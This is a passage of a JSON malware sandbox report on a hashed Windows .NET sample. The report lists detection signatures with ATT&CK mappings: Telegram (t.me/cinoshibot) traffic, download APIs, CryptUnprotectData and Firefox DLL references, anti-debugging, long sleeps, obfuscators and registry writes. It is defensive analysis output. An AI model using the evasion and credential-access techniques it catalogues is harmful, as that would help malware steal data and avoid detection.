Pattern match: \"system.web/pages\"\n Pattern match: \"system.web/partialtrustvisibleassemblies\"\n Pattern match: \"system.web/processmodel\"\n Pattern match: \"system.web/profile\"\n Pattern match: \"system.web/protocols\"\n Pattern match: \"system.web/rolemanager\"\n Pattern match: \"system.web/securitypolicy\"\n Pattern match: \"system.web/sessionpagestate\"\n Pattern match: \"system.web/sessionstate\"\n Pattern match: \"system.web/sitemap\"\n Pattern match: \"system.web/trace\"\n Pattern match: \"system.web/trust\"\n Pattern match: \"system.web/urlmappings\"\n Pattern match: \"system.web/webcontrols\"\n Pattern match: \"system.web/webparts\"\n Pattern match: \"system.web/webservices\"\n Pattern match: \"system.web/xhtmlconformance\"\n Pattern match: \"system.web/caching\"\n Pattern match: \"system.web/caching/cache\"\n Pattern match: \"system.web/caching/outputcache\"\n Pattern match: \"system.web/caching/outputcachesettings\"\n Pattern match: \"system.web/caching/sqlcachedependency\"\n Heuristic match: \"/.net/netclasses/httpwebrequest/connect__group$$/\"\n Pattern match: \"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name\"\n Pattern match: \"http://schemas.microsoft.com/ws/2008/06/identity/claims/groupsid\"\n Pattern match: \"http://www.w3.org/2001/xmlschema#string\"\n Pattern match: \"http://schemas.microsoft.com/ws/2008/06/identity/claims/role\"\n Pattern match: \"http://t.me\"\n Heuristic match: \"host: t.me\"\n Pattern match: \"https://t.me/cinoshibot\"\n Pattern match: \"https://t.me\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"ersion=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" allowLocation=\"false\" />\", Potential IP \"<IPv4>\" found in string \"ersion=<IPv4>\n Culture=neutral\n PublicKeyToken=b77a5c561934e089\" />\"\n Potential IP \"<IPv4>\" found in string \"n=<IPv4>, C\"\n Potential IP \"<IPv4>\" found in string \"<IPv4>, Cul\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://t.me/cinoshibotlocal\" - Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")\n Found URL \"http://go.microsoft.com/fwlink/?linkid=42127\" - Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")", "origin": "Memory Dumps", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-536", "type": 2, "relevance": 1, "name": "Contains ability to upload or download data from a specified domain", "description": "Found reference to API \"at System.Net.WebClient.DownloadDataInternal(System.Uri, System.Net.WebRequest ByRef)\" (Indicator: \"System.Net.WebClient\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")\n Found reference to API \"at System.Net.WebClient.DownloadString(System.Uri)\" (Indicator: \"System.Net.WebClient\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")\n Found reference to API \"at System.Net.WebClient.DownloadString(System.String)\" (Indicator: \"System.Net.WebClient\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")\n Found reference to API \"at System.Net.WebClient.DownloadDataInternal(Uri address, WebRequest& request)\" (Indicator: \"System.Net.WebClient\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to API \"at System.Net.WebClient.DownloadString(Uri address)\" (Indicator: \"System.Net.WebClient\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to API \"at System.Net.WebClient.DownloadString(String address)\" (Indicator: \"System.Net.WebClient\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to API \"System.Net.WebClient\" (Indicator: \"System.Net.WebClient\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1102.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1102/002"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; Source: \"00000000-00003656-00000C29-4370503467\")\n Found reference to API \"WinHttpOpen\" (Indicator: \"WinHttpOpen\"; Source: \"00000000-00003656-00000C29-4371369897\")\n Found reference to API \"WinHttpOpenW\" (Indicator: \"WinHttpOpen\"; Source: \"00000000-00003656-00000C29-4371370427\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-457", "type": 2, "relevance": 1, "name": "Found string related to HTTP headers", "description": "Found string \"HTTP/1.1 301 Moved Permanently\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"GET /cinoshibot HTTP/1.1\" (Indicator: \"HTTP/1.1\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-62", "type": 7, "relevance": 1, "name": "Communicates with HTTP webserver (GET/POST requests)", "description": "Found http requests in header \"GET /cinoshibot\"", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-55", "type": 7, "relevance": 1, "name": "JA3 SSL client fingerprint", "description": "Observed JA3 fingerprint: 6b0dc43f177fcd6d2946d55121243d1b", "origin": "Network Traffic"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "summary-27", "type": 15, "relevance": 2, "name": "Shows ability to send encrypted data to the internet", "description": "Sample contains ability to use Microsoft's Enhanced Cryptographic Provider APIs and contains ability to communicate with network", "origin": "Indicator Combinations", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-438", "type": 2, "relevance": 3, "name": "Contains ability to perform AES/RC4 encryption (API string)", "description": "Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-108", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption (API string)", "description": "Found reference to API \"description=\"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\"\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found reference to API \"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-212", "type": 2, "relevance": 1, "name": "Contains ability to perform decryption (API string)", "description": "Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-106", "type": 2, "relevance": 1, "name": "Contains ability to decode base64 data", "description": "Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found reference to API \"FromBase64String\" (Indicator: \"FromBase64String\"; Source: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-493", "type": 2, "relevance": 1, "name": "Contains reference to crypto DLLs", "description": "Found string \"\\nss3.dll\" (Indicator: \"\\nss3.dll\"; File: \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9\")\n Found string \"\\mozglue.dll\" (Indicator: \"\\mozglue.dll\"; File: \"00000000-00003656.00000001.343303.00CA2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-280", "type": 2, "relevance": 1, "name": "Contains reference to cryptographic keys", "description": "Found string \"http://www.w3.org/2001/04/xmlenc# EncryptedKey\" (Indicator: \"encryptedkey\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.Xml.KeyInfoEncryptedKey, System.Security, Version=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" (Indicator: \"encryptedkey\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "network-60", "type": 7, "relevance": 1, "name": "HTTP requests contain Base64 strings", "description": "Contains base64 string in header \"meConnection\" in header \"GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /cinoshibot HTTP/1.1Host: t.meConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to decode base64 data\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to perform AES/RC4 encryption (API string)\n Matched sigs: Contains key cryptographic functions (API string)\n Matched sigs: Contains ability to perform encryption (API string)\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains ability to perform decryption (API string)\n Matched sigs: Contains ability to use Microsoft's Enhanced Cryptographic Provider\n Matched sigs: Contains ability to decode base64 data\n Matched sigs: Contains reference to crypto DLLs\n Matched sigs: Contains ability to perform Base64 encoding/decoding\n Matched sigs: YARA signature match - Encryption logic used by malware\n Matched sigs: Contains reference to cryptographic keys\n Matched sigs: Calls an API typically used to import cryptographic keys into a CSP\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: HTTP requests contain Base64 strings\n Matched sigs: YARA signature match - AES encryption", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-31", "type": 15, "relevance": 1, "name": "Shows ability to use encryption for command and control traffic", "description": "The analysis shows use of encryption\n use of http/https that can be used to send encrypted data on command and control server. Matched sigs: YARA signature match - AES encryption\n Matched sigs: Found potential URL in binary/memory\n Matched sigs: Found potential IP address in binary/memory\n Matched sigs: Found potential URLs in memory dumps\n Matched sigs: Contains ability to communicate with network (API string)\n Matched sigs: Contacts server\n Matched sigs: Contacts domains\n Matched sigs: Spawned process connects to a network", "origin": "Indicator Combinations", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00003656.00000000.342704.000A0000.00000004.mdmp, 00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")\n Found string \"\\Windows\\system32\\DRIVERS\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003656.00000000.342704.00D10000.00000002.mdmp\")\n Found string \"MSAFD NetBIOS [\\Device\\NetBT_Tcpip6_{90A066FE-591C-47F3-850D-96C:\\Windows\\tracing\" (Indicator: \"\\Device\\\"; Source: \"00000000-00003656.00000001.343303.000A0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeDebugPrivilege\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00003656.00000001.343303.01910000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-406", "type": 2, "relevance": 1, "name": "Contains ability to shutdown system", "description": "Observed string: \"shutdown\" (Indicator: \"shutdown\") in Source: 00000000-00003656-00000C29-4374911399", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "External Systems", "identifier": "suricata-0", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET INFO Observed Telegram Domain (t .me in TLS SNI)\" (SID: 2041933, Rev: 2, Severity: 3) categorized as \"Misc activity\"", "origin": "Suricata Alerts"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Pattern Matching", "identifier": "yara-30", "type": 13, "relevance": 5, "name": "YARA signature match - Encryption logic used by malware", "description": "YARA signature for encryption logic matched on file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"CryptUnprotectData\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, API is part of module: CRYPT32.DLL)\n Found string \"Rectangle\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, API is part of module: GDI32.DLL)\n Found string \"Sleep\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, API is part of module: KERNELBASE.DLL)\n Found string \"GetCurrentProcess\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, API is part of module: KERNELBASE.DLL)\n Found string \"GetProcAddress\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, API is part of module: KERNELBASE.DLL)\n Found string \"CheckRemoteDebuggerPresent\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, API is part of module: KERNEL32.DLL)\n Found string \"FreeLibrary\" (Source: e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9, API is part of module: KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" at 00000000-00003656-00000105-5690074", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "string-6", "type": 2, "relevance": 2, "name": "Uses a .NET obfuscator to hide its code", "description": "\"CompressionLevel\" is a hint for the obfuscator \"MPRESS\"\n \"System.IO.Compression\" is a hint for the obfuscator \"MPRESS\"\n \"Confuser.Core 1.6.0+447341964f\" is a hint for the obfuscator \"Confuser\"\n \"Switch.System.IO.Compression.DoNotUseNativeZipLibraryForDecompression\" is a hint for the obfuscator \"MPRESS\"", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 3656)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-238", "type": 6, "relevance": 5, "name": "Tries to detect debugger using ProcessDebugPort", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe queries ProcessDebugPort (UID: 3656)", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" sleeping for \"1566804069\" milliseconds\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" sleeping for \"00600000\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLEFILETRACING\"; Value: \"00000000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"ENABLECONSOLETRACING\"; Value: \"00000000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILETRACINGMASK\"; Value: \"0000FFFF\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"MAXFILESIZE\"; Value: \"00001000\")\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" (Access type: \"SETVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASMANCS\"; Key: \"FILEDIRECTORY\"; Value: \"%windir%\\tracing\")", "origin": "Registry Access", "attck_id": "T1112", 